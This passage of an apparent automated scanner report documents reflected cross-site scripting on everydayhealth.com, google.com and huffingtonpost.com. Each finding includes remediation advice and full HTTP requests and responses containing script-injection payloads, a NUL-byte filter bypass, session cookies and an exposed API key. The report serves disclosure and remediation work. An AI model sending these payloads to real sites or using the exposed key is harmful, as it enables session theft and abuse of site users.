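for (const input of [DOUBLE_ENCODED, NUL_PREFIXED, BENIGN]) {
  console.log(input,
    'double-decode:', validateThenDoubleDecode(input).allowed,
    'native filter:', nativeFilterThenApp(input).allowed,
    'hardened:', canonicaliseThenValidate(input).allowed);
}
```

In the hardened ordering the double-encoded input is allowed through, but what reaches the page is the literal text f3384%3c%2fscript%3e0ccc1ec0bf6, which is harmless because nothing decodes it again; the point of the remediation text above is that the validation and the final decode must operate on the same bytes.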

Request

GET /allergy/climate-change-and-allergies.aspx?%00c6e76"><script>alert(1)</script>76c82397b8f=1 HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:56:34 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpO*ri-NiNTMxMWZkZS04NTY4LTRiYjEtODAwOC0xN2Q0NzQ1YTM0NGQ1; expires=Wed, 13-Jul-2011 21:36:34 GMT; path=/
Set-Cookie: ASP.NET_SessionId=c5cfbq55mbxvfz55feiauhef; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49343


<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

<head id="head"><title>
   Can Climate Change Cause Allergy? - Allergy Center - Every
...[SNIP]...
<meta property="og:url" runat="server" id="fburl" content="http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx?%00c6e76"><script>alert(1)</script>76c82397b8f=1" />
...[SNIP]...

2.10. http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.everydayhealth.com
Path:   /heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ac7e'%3b98481e38035 was submitted in the REST URL parameter 3. This input was echoed as 8ac7e';98481e38035 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. As in item 2.8, the reflection is in a 404 response whose body the browser parses and executes regardless of the status code.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx8ac7e'%3b98481e38035 HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Connection: close
Date: Thu, 05 May 2011 10:56:36 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpPFHohNiNzhlZWI5Mi02YzQyLTQyMWMtOWExZS1iZWJlZjRmYjg5ZTU1; expires=Wed, 13-Jul-2011 21:36:36 GMT; path=/
Set-Cookie: ASP.NET_SessionId=hxo2de55iuwcrdvelxqosn55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16547


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<script> COMSCORE.beacon({ c1: 2, c2: '6035818', c3: '', c4: 'www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx8ac7e';98481e38035', c5: '', c6: '', c15: ''});</script>
...[SNIP]...

2.11. http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.everydayhealth.com
Path:   /heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %004b806"><script>alert(1)</script>8759e8fbd80 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4b806"><script>alert(1)</script>8759e8fbd80 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx?%004b806"><script>alert(1)</script>8759e8fbd80=1 HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:56:35 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpPB*XTNmOWRkZmU1ZS0xODQ2LTQ1ZTAtYWNlYS0xY2FjNmI1YzNlZDI1; expires=Wed, 13-Jul-2011 21:36:35 GMT; path=/
Set-Cookie: ASP.NET_SessionId=k0j5vvz5mxglzzntqc5yh03h; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49861


<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

<head id="head"><title>
   Is Cholesterol Treatment Worth It? - EverydayHealth.com
<
...[SNIP]...
<meta property="og:url" runat="server" id="fburl" content="http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx?%004b806"><script>alert(1)</script>8759e8fbd80=1" />
...[SNIP]...

2.12. http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.everydayhealth.com
Path:   /kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a9361'%3b84c782d8b16 was submitted in the REST URL parameter 3. This input was echoed as a9361';84c782d8b16 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspxa9361'%3b84c782d8b16 HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Connection: close
Date: Thu, 05 May 2011 10:56:36 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpPEoo5s1MDkxMWEzZi0yMDZiLTRjYTAtYWNmNS0wZTY1YTU3ODg5ZjQ1; expires=Wed, 13-Jul-2011 21:36:36 GMT; path=/
Set-Cookie: ASP.NET_SessionId=xn1xydrmhljdevihanbstg45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16563


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<script> COMSCORE.beacon({ c1: 2, c2: '6035818', c3: '', c4: 'www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspxa9361';84c782d8b16', c5: '', c6: '', c15: ''});</script>
...[SNIP]...

2.13. http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.everydayhealth.com
Path:   /kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00a9efd"><script>alert(1)</script>8b47a959d8d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a9efd"><script>alert(1)</script>8b47a959d8d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx?%00a9efd"><script>alert(1)</script>8b47a959d8d=1 HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:56:35 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpPBnhcM4ODI1YTExNS0xOGU4LTQwMDktOTliYi0wZGFlYzYyZDY0MGU1; expires=Wed, 13-Jul-2011 21:36:35 GMT; path=/
Set-Cookie: ASP.NET_SessionId=zln3ns55gb5bpcmolex34fm4; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49142


<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

<head id="head"><title>
   TVs Common in Daycare Centers Despite Guidelines - Kids' H
...[SNIP]...
<meta property="og:url" runat="server" id="fburl" content="http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx?%00a9efd"><script>alert(1)</script>8b47a959d8d=1" />
...[SNIP]...

2.14. http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.everydayhealth.com
Path:   /sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f526d'%3bb39bf44577d was submitted in the REST URL parameter 3. This input was echoed as f526d';b39bf44577d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspxf526d'%3bb39bf44577d HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Connection: close
Date: Thu, 05 May 2011 10:56:37 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpPID-ztmODA3YjBjZC03ZWNhLTRlNTQtODI4OS1lYTk2OWZjNDIxNzI1; expires=Wed, 13-Jul-2011 21:36:37 GMT; path=/
Set-Cookie: ASP.NET_SessionId=w3vie3btzynw5f451gmktxfe; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16651


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<script> COMSCORE.beacon({ c1: 2, c2: '6035818', c3: '', c4: 'www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspxf526d';b39bf44577d', c5: '', c6: '', c15: ''});</script>
...[SNIP]...

2.15. http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.everydayhealth.com
Path:   /sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d45e7"><script>alert(1)</script>ec06d481550 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d45e7"><script>alert(1)</script>ec06d481550 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx?%00d45e7"><script>alert(1)</script>ec06d481550=1 HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:56:36 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpPE-GLMyMDBhOGIyYi0wNTRiLTQ3ZmYtYTVhZC00MDg4M2QxNGVlMTM1; expires=Wed, 13-Jul-2011 21:36:36 GMT; path=/
Set-Cookie: ASP.NET_SessionId=jud0jt45dvf1vafmolehev55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47550


<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

<head id="head"><title>
   3 Ways to Put the Wow! Back in Your Sex Life - Sexual Heal
...[SNIP]...
<meta property="og:url" runat="server" id="fburl" content="http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx?%00d45e7"><script>alert(1)</script>ec06d481550=1" />
...[SNIP]...

2.16. http://www.google.com/advanced_search [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.google.com
Path:   /advanced_search

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 77493(a)5729f6350b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advanced_search?77493(a)5729f6350b6=1 HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1303613395.1.1.utmcsr=xss.cx|utmccn=(referral)|utmcmd=referral|utmcct=/apptesting.aspx; __utma=173272373.620417115.1303613395.1303613395.1303613395.1; NID=46=Ba0U4da8P8fQA7x45DtUHYILglZeYGIGups8rg_DvVz_eZJte3UjlHF5LBgdHRELPDWgg_M2c4cfEuCb_MKRBOuEFsxKD3DPCgbNnbLWJ4NjJXl0O-Jy3456noCUlqNv; PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:57:38 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Google Advanced Search</title><style id=gstyle>html{overflow-y:scroll}div,td,.n a,.n a:visited{color:#000}.ts td,.
...[SNIP]...
t()});
})();
;}catch(e){google.ml(e,false,{'cause':'defer'});}if(google.med) {google.med('init');google.initHistory();google.med('history');}google.History&&google.History.initialize('/advanced_search?77493(a)5729f6350b6\x3d1')});if(google.j&&google.j.en&&google.j.xi){window.setTimeout(google.j.xi,0);}</script>
...[SNIP]...

2.17. http://www.huffingtonpost.com/ [icid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /

Issue detail

The value of the icid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8739e"-alert(1)-"26ca8215966 was submitted in the icid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?icid=navbar_huffpo_main58739e"-alert(1)-"26ca8215966 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: max-age=29
Date: Thu, 05 May 2011 00:58:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 268951

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
= 1;
   HPConfig.current_vertical_name = "homepage";
   HPConfig.current_vertical_id = -1;    
   HPConfig.current_web_address = "www.huffingtonpost.com";
HPConfig.current_uri = "/?icid=navbar_huffpo_main58739e"-alert(1)-"26ca8215966";
   HPConfig.inst_type = "prod";
   HPConfig.timestamp_for_clearing_js = "1304533217";
   HPConfig.bit_ly_key = {"user_name":"huffpost","user_key":"R_3db9b90fe8f78f0f2b180e72055462c8"};
   HPConfig.display_d
...[SNIP]...

2.18. http://www.huffingtonpost.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a79a"-alert(1)-"0ae47100ee4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?icid=navbar_huffpo_main5&7a79a"-alert(1)-"0ae47100ee4=1 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: max-age=30
Date: Thu, 05 May 2011 00:58:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 268938

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
= 1;
   HPConfig.current_vertical_name = "homepage";
   HPConfig.current_vertical_id = -1;    
   HPConfig.current_web_address = "www.huffingtonpost.com";
HPConfig.current_uri = "/?icid=navbar_huffpo_main5&7a79a"-alert(1)-"0ae47100ee4=1";
   HPConfig.inst_type = "prod";
   HPConfig.timestamp_for_clearing_js = "1304533217";
   HPConfig.bit_ly_key = {"user_name":"huffpost","user_key":"R_3db9b90fe8f78f0f2b180e72055462c8"};
   HPConfig.display
...[SNIP]...

2.19. http://www.huffingtonpost.com/2011/05/02/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /2011/05/02/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76498"-alert(1)-"978acabc995 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011/05/02/?76498"-alert(1)-"978acabc995=1 HTTP/1.1
Host: www.huffingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; geocity=Dallas; huffpo_type_views=%7B%2215%22%3A1%7D; is_aol_user=1; s_pers=%20s_getnr%3D1304578722710-Repeat%7C1367650722710%3B%20s_nrgvo%3DRepeat%7C1367650722712%3B; huffpost_adssale=n; __utma=265287574.457433518.1304575105.1304575105.1304578723.2; geostate=Texas; __utmc=265287574; __utmb=265287574.3.10.1304578723; __qca=P0-822287727-1304575116403; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Length: 123154
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=277
Date: Thu, 05 May 2011 10:58:31 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
le_fb_widgets = 1;
   HPConfig.current_vertical_name = "homepage";
   HPConfig.current_vertical_id = -1;    
   HPConfig.current_web_address = "www.huffingtonpost.com";
HPConfig.current_uri = "/2011/05/02/?76498"-alert(1)-"978acabc995=1";
   HPConfig.inst_type = "prod";
   HPConfig.timestamp_for_clearing_js = "1304533217";
   HPConfig.bit_ly_key = {"user_name":"huffpost","user_key":"R_3db9b90fe8f78f0f2b180e72055462c8"};
   HPConfig.display
...[SNIP]...

2.20. http://www.huffingtonpost.com/2011/05/02/holocaust-memorial-day_n_856638.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /2011/05/02/holocaust-memorial-day_n_856638.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57a5e"-alert(1)-"d6ccc38ed4b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011/05/02/holocaust-memorial-day_n_856638.html?57a5e"-alert(1)-"d6ccc38ed4b=1 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; huffpo_type_views=%7B%2215%22%3A1%7D; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.14.9.1304575182212; s_pers=%20s_getnr%3D1304575182214-New%7C1367647182214%3B%20s_nrgvo%3DNew%7C1367647182216%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolhuffpo%252Caolsvc%253D%252526pid%25253Dhpo%25252520%2525253A%25252520Osama%25252520Bin%25252520Laden%25252520Pictures%25252520Will%25252520Not%25252520Be%25252520Released%2525252C%25252520Obama%25252520Decides%25252520%25252528UPDATED%25252529%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.huffingtonpost.com/2011/05/02/holocaust-memorial-day_n_856638.html%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Expires: Thu, 05 May 2011 01:00:54 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Thu, 05 May 2011 01:00:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 470003

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns
...[SNIP]...
ent_vertical_name = 'world';
   HPConfig.current_vertical_id = 15;    
   HPConfig.current_web_address = "www.huffingtonpost.com";
HPConfig.current_uri = "/2011/05/02/holocaust-memorial-day_n_856638.html?57a5e"-alert(1)-"d6ccc38ed4b=1";
   HPConfig.hp_static_domain = "s.huffpost.com";
   HPConfig.inst_type = "prod";
